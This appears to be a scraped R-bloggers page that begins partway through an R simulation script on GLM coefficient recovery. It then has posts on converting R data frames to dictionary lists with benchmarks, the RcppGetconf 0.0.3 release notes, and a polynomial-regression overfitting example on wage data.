full_data_method <- results_df %>% filter(grepl("^Using full data", method )) %>% arrange(desc(mse)) full_data_method %>% ggplot(aes(x = prop_suppressed, y = n, colour = mse > 3, size = mse)) + geom_point() + labs(x = "Proportion of data that were suppressed as <6", y = "Number of cells in table", size = "Mean squared error of coefficients:", colour = "Unusually large:") + ggtitle("Performance of a model with the true underlying data", "General success and occasional complete failure to pick the underlying data generating process") full_data_method # some really bad runs are 125, 721, 506, lets look at just one: run125 <- coefs_comp(125, output = "all") run125$data %>% select(animals, region, count, expected) %>% knitr::kable() run125$all_coefficients %>% mutate(method = str_wrap(method, 30)) %>% ggplot(aes(x = underlying, y = value, label = labels)) + geom_abline(slope = 1, intercept = 0) + geom_text() + facet_wrap(~method) + ggtitle("Example of a particularly poorly performing model with the real data", "Model run 125;\nMany zeroes in the data mean the GLM estimates are highly unstable") + labs(x = "True value of underlying coefficients", y = "Estimate from various types of model") # lots of 25s: glm(count ~ animals * region, data = run125$data, family = "poisson")

To leave a comment for the author, please follow the link and comment on their blog: free range statistics - R.

Convert Data Frame to Dictionary List in R

Sat, 11/17/2018 - 06:01

(This article was first published on S+/R – Yet Another Blog in Statistical Computing, and kindly contributed to R-bloggers)

In R, there are several ways to convert a column-oriented data frame into a row-oriented dictionary list or something similar, e.g. a list of lists.

In the code snippet below, I show each approach and how to extract keys and values from the dictionary. As shown in the benchmark, it appears that the generic R data structure is still the most efficient.

### LIST() FUNCTION IN BASE PACKAGE ###
x1 <- as.list(iris[1, ])
names(x1)
# [1] "Sepal.Length" "Sepal.Width" "Petal.Length" "Petal.Width" "Species"
x1[["Sepal.Length"]]
# [1] 5.1

### ENVIRONMENT-BASED SOLUTION ###
envn_dict <- function(x) {
  e <- new.env(hash = TRUE)
  for (name in names(x)) assign(name, x[, name], e)
  return(e)
}
x2 <- envn_dict(iris[1, ])
ls(x2)
# [1] "Petal.Length" "Petal.Width" "Sepal.Length" "Sepal.Width" "Species"
x2[["Sepal.Length"]]
# [1] 5.1

### COLLECTIONS PACKAGE ###
coll_dict <- function(x) {
  d <- collections::Dict$new()
  for (name in names(x)) d$set(name, x[, name])
  return(d)
}
x3 <- coll_dict(iris[1, ])
x3$keys()
# [1] "Petal.Length" "Petal.Width" "Sepal.Length" "Sepal.Width" "Species"
x3$get("Sepal.Length")
# [1] 5.1

### HASH PACKAGE ###
hash_dict <- function(x) {
  d <- hash::hash()
  for (name in names(x)) d[[name]] <- x[, name]
  return(d)
}
x4 <- hash_dict(iris[1, ])
hash::keys(x4)
# [1] "Petal.Length" "Petal.Width" "Sepal.Length" "Sepal.Width" "Species"
hash::values(x4, "Sepal.Length")
# Sepal.Length
#          5.1

### DATASTRUCTURES PACKAGE ###
data_dict <- function(x) {
  d <- datastructures::hashmap()
  for (name in names(x)) d[name] <- x[, name]
  return(d)
}
x5 <- data_dict(iris[1, ])
datastructures::keys(x5)
# [1] "Species" "Sepal.Width" "Petal.Length" "Sepal.Length" "Petal.Width"
datastructures::get(x5, "Sepal.Length")
# [1] 5.1

### FROM PYTHON ###
py2r_dict <- function(x) {
  return(reticulate::py_dict(names(x), x, TRUE))
}
x6 <- py2r_dict(iris[1, ])
x6$keys()
# [1] "Petal.Length" "Sepal.Length" "Petal.Width" "Sepal.Width" "Species"
x6["Sepal.Length"]
# [1] 5.1

### CONVERT DATAFRAME TO DICTIONARY LIST ###
to_list <- function(df, fn) {
  l <- list()
  for (i in seq(nrow(df))) l[[i]] <- fn(df[i, ])
  return(l)
}

rbenchmark::benchmark(replications = 100, order = "elapsed", relative = "elapsed",
  columns = c("test", "replications", "elapsed", "relative", "user.self", "sys.self"),
  "BASE::LIST" = to_list(iris, as.list),
  "BASE::ENVIRONMENT" = to_list(iris, envn_dict),
  "COLLECTIONS::DICT" = to_list(iris, coll_dict),
  "HASH::HASH" = to_list(iris, hash_dict),
  "DATASTRUCTURES::HASHMAP" = to_list(iris, data_dict),
  "RETICULATE::PY_DICT" = to_list(iris, py2r_dict)
)
#                      test replications elapsed relative user.self sys.self
# 1              BASE::LIST          100   0.857    1.000     0.857    0.000
# 2       BASE::ENVIRONMENT          100   1.607    1.875     1.607    0.000
# 4              HASH::HASH          100   2.600    3.034     2.600    0.000
# 3       COLLECTIONS::DICT          100   2.956    3.449     2.956    0.000
# 5 DATASTRUCTURES::HASHMAP          100  16.070   18.751    16.071    0.000
# 6     RETICULATE::PY_DICT          100  18.030   21.039    18.023    0.008
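
For completeness, one more base-R route, not included in the benchmark above (so its relative speed is untested here): split() the data frame by row and coerce each one-row piece to a list.

row_list <- lapply(split(iris, seq_len(nrow(iris))), as.list)
row_list[[1]][["Sepal.Length"]]
# [1] 5.1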

To leave a comment for the author, please follow the link and comment on their blog: S+/R – Yet Another Blog in Statistical Computing.

RcppGetconf 0.0.3

Sat, 11/17/2018 - 01:23

(This article was first published on Thinking inside the box , and kindly contributed to R-bloggers)

A second and minor update for the RcppGetconf package for reading system configuration — not unlike getconf from the libc library — is now on CRAN.

Changes are minor. We avoid an error on a long-dead operating system cherished in one particular corner of the CRAN world. In doing so, some files were updated so that dynamically loaded routines are now registered too.

The short list of changes in this release follows:

Changes in RcppGetconf version 0.0.3 (2018-11-16)
  • Examples no longer run on Solaris where they appear to fail.

Courtesy of CRANberries, there is a diffstat report. More about the package is at the local RcppGetconf page and the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.


To leave a comment for the author, please follow the link and comment on their blog: Thinking inside the box.

Example of Overfitting

Sat, 11/17/2018 - 00:31

(This article was first published on Mad (Data) Scientist, and kindly contributed to R-bloggers)

I occasionally see queries on various social media about overfitting — what is it, and so on. I’ll post an example here. (I mentioned it at my talk the other night on our novel approach to missing values, but had a bug in the code. Here is the correct account.)

The dataset is prgeng, on wages of programmers and engineers in Silicon Valley as of the 2000 Census. It’s included in our polyreg package, which we developed as an alternative to neural networks. But the package is quite useful in its own right, as it makes it very convenient to fit multivariate polynomial models. (Not as easy as it sounds; e.g. one must avoid cross products of orthogonal dummy variables, powers of those variables, etc.)

First I split the data into training and test sets:

 

> set.seed(88888)
> getPE()
> pe1 <- pe[,c(1,2,4,6,7,12:16,3)]
> testidxs <- sample(1:nrow(pe1),1000)
> testset <- pe1[testidxs,]
> trainset <- pe1[-testidxs,]

As a base, I fit an ordinary degree-1 model and found the mean absolute prediction error:

> lmout <- lm(wageinc ~ .,data=trainset)
> predvals <- predict(lmout,testset[,-11])
> mean(abs(predvals - testset[,11]))
[1] 25456.98

Next, I tried a quadratic model:

> pfout <- polyFit(trainset,deg=2)
> mean(abs(predict(pfout,testset[,-11]) - testset[,11]))
[1] 24249.83

Note that, though originally there were 10 predictors, now with polynomial terms we have 46.

I kept going:

deg   MAPE        # terms
  3   23951.69        118
  4   23974.76        226
  5   24340.85        371
  6   24554.34        551
  7   36463.61        767
  8   74296.09       1019
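
(The loop behind this table isn't shown above; a plausible sketch, reusing polyFit() and the same column indices as the degree-2 call, would be:)

for (d in 3:8) {
  pfout <- polyFit(trainset, deg = d)
  mape  <- mean(abs(predict(pfout, testset[,-11]) - testset[,11]))
  cat("deg", d, "MAPE", mape, "\n")
}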

One must keep in mind the effect of sampling variation, and repeated trials would be useful here, but it seems that the data can stand at least a cubic fit, and possibly as much as degree 5 or even 6. To be conservative, it would seem wise to stop at degree 3. That’s also consistent with the old Tukey rule of thumb that we should have p ≤ sqrt(n), n being about 20,000 here.
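
A quick check of that rule of thumb: sqrt(n) is about 141 here, so the cubic fit's 118 terms sit under the bound while the quartic's 226 are well over it.

> sqrt(20000)
[1] 141.4214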

In any event, the effects of overfitting here are dramatic, starting at degree 7.

It should be noted that I made no attempt to clean the data, nor to truncate predicted values at 0, etc.

It should also be noted that, starting at degree 4, R emitted warnings, “prediction from a rank-deficient fit may be misleading.” It is well known that at high degrees, polynomial terms can have multicollinearity issues.

Indeed, this is a major point we make in our arXiv paper cited above. There we argue that neural networks are polynomial models in disguise, with the effective degree of the polynomial increasing a lot at each successive layer, and thus multicollinearity increasing from layer to layer. We’ve confirmed this empirically. We surmise that this is a major cause of convergence problems in NNs.

Finally, whenever I talk about polynomials and NNs, I hear the standard (and correct) concern that polynomials grow rapidly at the edges of the data. True, but I would point out that if you accept NNs = polynomials, then the same is true for NNs.

We’re still working on the polynomials/NNs project. More developments to be announced soon. But for those who are wondering about overfitting, the data here should make the point.


To leave a comment for the author, please follow the link and comment on their blog: Mad (Data) Scientist.
